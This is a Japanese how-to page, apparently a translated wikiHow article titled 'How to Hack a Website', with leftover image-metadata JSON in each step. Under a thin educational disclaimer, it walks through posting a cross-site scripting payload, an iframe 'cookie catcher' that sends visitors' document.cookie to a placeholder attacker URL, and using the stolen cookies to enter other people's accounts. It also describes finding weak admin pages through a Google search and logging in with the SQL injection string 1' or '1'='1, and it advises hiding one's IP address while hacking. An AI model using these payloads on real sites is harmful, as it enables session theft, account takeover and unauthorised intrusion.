ウェブサイトをハッキングする方法

注意: このガイドは教育目的のみであり、Web サイトのセキュリティを向上させるための正当な侵入テストに使用する必要があります。このガイドでは、セキュリティが不十分な Web サイトにハッキングする方法を段階的に説明します。

ステップ

クロスサイトスクリプティング手法の使用

1. {"smallUrl":"https:\/\/www.wikihow.com\/images_en\/thumb\/e\/e6\/Hack-a-Website-Step-1-Version-2.jpg\/v4-460px-Hack-a-Website-Step-1-Version-2.jpg","bigUrl":"https:\/\/www.wikihow.com\/images\/thumb\/e\/e6\/Hack-a-Website-Step-1-Version-2.jpg\/v4-828px-Hack-a-Website-Step-1-Version-2.jpg","smallWidth":460,"smallHeight":345,"bigWidth":728,"bigHeight":546,"licensing":"<div class=\"mw-parser-output\"><\/div>"} 1投稿できるセキュリティの低い Web サイトを見つけます。たとえば、情報投稿を公開できる Web サイトなどです。なお、ウェブサイトのセキュリティが強固な場合は、以下の侵入方法は機能しません。
2. {"smallUrl":"https:\/\/www.wikihow.com\/images_en\/thumb\/2\/2f\/Hack-a-Website-Step-2-Version-2.jpg\/v4-460px-Hack-a-Website-Step-2-Version-2.jpg","bigUrl":"https:\/\/www.wikihow.com\/images\/thumb\/2\/2f\/Hack-a-Website-Step-2-Version-2.jpg\/v4-728px-Hack-a-Website-Step-2-Version-2.jpg","smallWidth":460,"smallHeight":345,"bigWidth":728,"bigHeight":546,"licensing":"<div class=\"mw-parser-output\"><\/div>"} 2投稿を作成します。投稿コンテンツに何かを入力すると、誰が投稿をクリックしてもデータが盗まれるようになります。
   • ウェブサイトのシステムがコードをフィルタリングするかどうかをテストして確認できます。投稿に <script...>alert(“test”)</...script> と入力します (ピリオドを削除します)。投稿をクリックすると、サイトが脆弱であることを示す警告ウィンドウが表示されます。
3. {"smallUrl":"https:\/\/www.wikihow.com\/images_en\/thumb\/4\/46\/Hack-a-Website-Step-3-Version-2.jpg\/v4-460px-Hack-a-Website-Step-3-Version-2.jpg","bigUrl":"https:\/\/www.wikihow.com\/images\/thumb\/4\/46\/Hack-a-Website-Step-3-Version-2.jpg\/v4-728px-Hack-a-Website-Step-3-Version-2.jpg","smallWidth":460,"smallHeight":345,"bigWidth":728,"bigHeight":546,"licensing":"<div class=\"mw-parser-output\"><\/div>"} 3クッキーキャッチャーを作成してアップロードします。この攻撃の目的は、ユーザーのCookieコンテンツを盗むことです。Cookieコンテンツを通じて、セキュリティが弱いWebサイトに簡単にログインし、相手のアカウントに入ることができます。ここでは、ユーザーの Cookie をキャプチャして転送する Cookie キャッチャー (何らかのコード) を準備する必要があります。ログイン可能で PHP Web ページをサポートする Web サイトにキャッチャーをアップロードできます。参考までに例にクッキーキャッチャーがあります。
4. {"smallUrl":"https:\/\/www.wikihow.com\/images_en\/thumb\/b\/b9\/Hack-a-Website-Step-4-Version-2.jpg\/v4-460px-Hack-a-Website-Step-4-Version-2.jpg","bigUrl":"https:\/\/www.wikihow.com\/images\/thumb\/b\/b9\/Hack-a-Website-Step-4-Version-2.jpg\/v4-728px-Hack-a-Website-Step-4-Version-2.jpg","smallWidth":460,"smallHeight":345,"bigWidth":828,"bigHeight":546,"licensing":"<div class=\"mw-parser-output\"><\/div>"} 4クッキーキャッチャーと一緒に投稿を公開します。特定のコードを入力することで、投稿がユーザーの Cookie をキャプチャし、それを Web サイトに送信することを許可できます。訪問者の疑いを減らし、管理者が投稿を削除する可能性を減らすために、コードの後に​​テキストを入力する必要があります。
   • クッキー キャッチャーの例: <...iframe... frameborder= 0 height=0 width=0 src=javascript...:void(document.location=”YOURURL/cookiecatcher.php?c=”+document.cookie)><.../iframe> (ピリオドを削除します。)
5. {"smallUrl":"https:\/\/www.wikihow.com\/images_en\/thumb\/d\/df\/Hack-a-Website-Step-5-Version-2.jpg\/v4-460px-Hack-a-Website-Step-5-Version-2.jpg","bigUrl":"https:\/\/www.wikihow.com\/images\/thumb\/d\/df\/Hack-a-Website-Step-5-Version-2.jpg\/v4-728px-Hack-a-Website-Step-5-Version-2.jpg","smallWidth":460,"smallHeight":345,"bigWidth":728,"bigHeight":546,"licensing":"<div class=\"mw-parser-output\"><\/div>"} 5スクレイピングされた Cookie を使用します。その後、キャプチャした Cookie を自分の Web サイトに送信したり、相手の Cookie を自由に使用したりできるようになります。 広告する

インジェクション攻撃の実行

1. {"smallUrl":"https:\/\/www.wikihow.com\/images_en\/thumb\/a\/a2\/Hack-a-Website-Step-6-Version-2.jpg\/v4-460px-Hack-a-Website-Step-6-Version-2.jpg","bigUrl":"https:\/\/www.wikihow.com\/images\/thumb\/a\/a2\/Hack-a-Website-Step-6-Version-2.jpg\/v4-728px-Hack-a-Website-Step-6-Version-2.jpg","smallWidth":460,"smallHeight":345,"bigWidth":728,"bigHeight":546,"licensing":"<div class=\"mw-parser-output\"><\/div>"} 1セキュリティの低い Web サイトを見つけます。管理者 (admin) アカウントのセキュリティが低く、ハッキングされやすい Web サイトを見つける必要があります。これら 2 つのキーワード admin login.asp を Google で検索できます。
2. {"smallUrl":"https:\/\/www.wikihow.com\/images_en\/thumb\/a\/af\/Hack-a-Website-Step-7-Version-2.jpg\/v4-460px-Hack-a-Website-Step-7-Version-2.jpg","bigUrl":"https:\/\/www.wikihow.com\/images\/thumb\/a\/af\/Hack-a-Website-Step-7-Version-2.jpg\/v4-728px-Hack-a-Website-Step-7-Version-2.jpg","smallWidth":460,"smallHeight":345,"bigWidth":728,"bigHeight":546,"licensing":"<div class=\"mw-parser-output\"><\/div>"} 2管理者としてログインします。ユーザー名として admin と入力し、数字または文字列をパスワードとしてログインします。パスワードは数字と文字の任意の組み合わせにすることができますが、最も一般的な例は 1' または '1'='1 です。
3. 3 忍耐強くいてください。間違ったパスワードを数回試す必要があるため、しばらく時間がかかります。
4. {"smallUrl":"https:\/\/www.wikihow.com\/images_en\/thumb\/2\/26\/Hack-a-Website-Step-9-Version-2.jpg\/v4-460px-Hack-a-Website-Step-9-Version-2.jpg","bigUrl":"https:\/\/www.wikihow.com\/images\/thumb\/2\/26\/Hack-a-Website-Step-9-Version-2.jpg\/v4-728px-Hack-a-Website-Step-9-Version-2.jpg","smallWidth":460,"smallHeight":345,"bigWidth":828,"bigHeight":546,"licensing":"<div class=\"mw-parser-output\"><\/div>"} 4ウェブサイトを入力します。最後に、特定のパスワードを使用してセキュリティの低い Web サイトにログインし、侵入することができます。 広告する

侵攻成功に向けた準備

1. {"smallUrl":"https:\/\/www.wikihow.com\/images_en\/thumb\/0\/00\/Hack-a-Website-Step-10-Version-2.jpg\/v4-460px-Hack-a-Website-Step-10-Version-2.jpg","bigUrl":"https:\/\/www.wikihow.com\/images\/thumb\/0\/00\/Hack-a-Website-Step-10-Version-2.jpg\/v4-728px-Hack-a-Website-Step-10-Version-2.jpg","smallWidth":460,"smallHeight":345,"bigWidth":728,"bigHeight":546,"licensing":"<div class=\"mw-parser-output\"><\/div>"} 1プログラミング言語を1つか2つ学びます。ウェブサイトのハッキングの本質を本当に理解したいのであれば、コンピューターとインターネットの仕組みを理解する必要があります。 Python や SQL などのプログラミング言語を 1 つまたは 2 つ学習すると、コンピューターをより適切に制御し、Web サイト システムの弱点を見つけることができます。
2. {"smallUrl":"https:\/\/www.wikihow.com\/images_en\/thumb\/2\/2f\/Hack-a-Website-Step-11-Version-2.jpg\/v4-460px-Hack-a-Website-Step-11-Version-2.jpg","bigUrl":"https:\/\/www.wikihow.com\/images\/thumb\/2\/2f\/Hack-a-Website-Step-11-Version-2.jpg\/v4-728px-Hack-a-Website-Step-11-Version-2.jpg","smallWidth":460,"smallHeight":345,"bigWidth":728,"bigHeight":546,"licensing":"<div class=\"mw-parser-output\"><\/div>"} 2 HTML の基礎をしっかり学びます。特定の Web ページをハッキングするには、HTML と JavaScript を十分に理解している必要もあります。これらのコードを習得するにはある程度の時間がかかりますが、インターネット上には優れた学習教材がたくさんあります。注意深く探せば、きっと見つかります。
3. {"smallUrl":"https:\/\/www.wikihow.com\/images_en\/thumb\/a\/a2\/Hack-a-Website-Step-12-Version-2.jpg\/v4-460px-Hack-a-Website-Step-12-Version-2.jpg","bigUrl":"https:\/\/www.wikihow.com\/images\/thumb\/a\/a2\/Hack-a-Website-Step-12-Version-2.jpg\/v4-728px-Hack-a-Website-Step-12-Version-2.jpg","smallWidth":460,"smallHeight":345,"bigWidth":728,"bigHeight":546,"licensing":"<div class=\"mw-parser-output\"><\/div>"} 3ホワイトハットハッカーに相談する。ホワイトハットハッカーとは、ハッキングの知識を持ち、その能力を適切な場所で活用する特別なハッカーです。ホワイトハットハッカーはセキュリティの脆弱性を明らかにし、インターネットをより安定して便利なものにします。あなたも正義の力を利用したい場合や、自分のウェブサイトのセキュリティを保護したい場合は、ホワイトハットハッカーに相談してアドバイスを求めることができます。
4. 4. リサーチをしましょう。ウェブサイトをハッキングする方法を学びたい場合、または自分のウェブサイトを保護したい場合は、多くの調査を行う必要があります。ウェブサイトが攻撃される方法はたくさんあるので、関連する知識を学び続けましょう。
5. {"smallUrl":"https:\/\/www.wikihow.com\/images_en\/thumb\/c\/ce\/Hack-a-Website-Step-14-Version-2.jpg\/v4-460px-Hack-a-Website-Step-14-Version-2.jpg","bigUrl":"https:\/\/www.wikihow.com\/images\/thumb\/c\/ce\/Hack-a-Website-Step-14-Version-2.jpg\/v4-728px-Hack-a-Website-Step-14-Version-2.jpg","smallWidth":460,"smallHeight":345,"bigWidth":728,"bigHeight":546,"licensing":"<div class=\"mw-parser-output\"><\/div>"} 5最新情報を入手してください。ウェブサイトのハッキング方法は常に変化しているため、最新の関連知識を常に把握しておく必要があります。 1 つの攻撃で何もできないからといって、他の脆弱性がないということではありません。 広告する

ヒント

• 役立つヒントやコツについては、ハッカー フォーラムにアクセスしてください。

警告する

• 実際にウェブサイトをハッキングしようとする場合は、IP アドレスを隠すソフトウェアを使用してください。
• このウェブサイトを読んだだけでは、すぐにハッカーになれるわけではありません。成功するには多くの知識を学び、さらに練習する必要があります。
• ウェブサイトをハッキングすることは絶対に違法です。ウェブサイトへのハッキングに関与した場合、間違いなく法的な問題に巻き込まれることになります。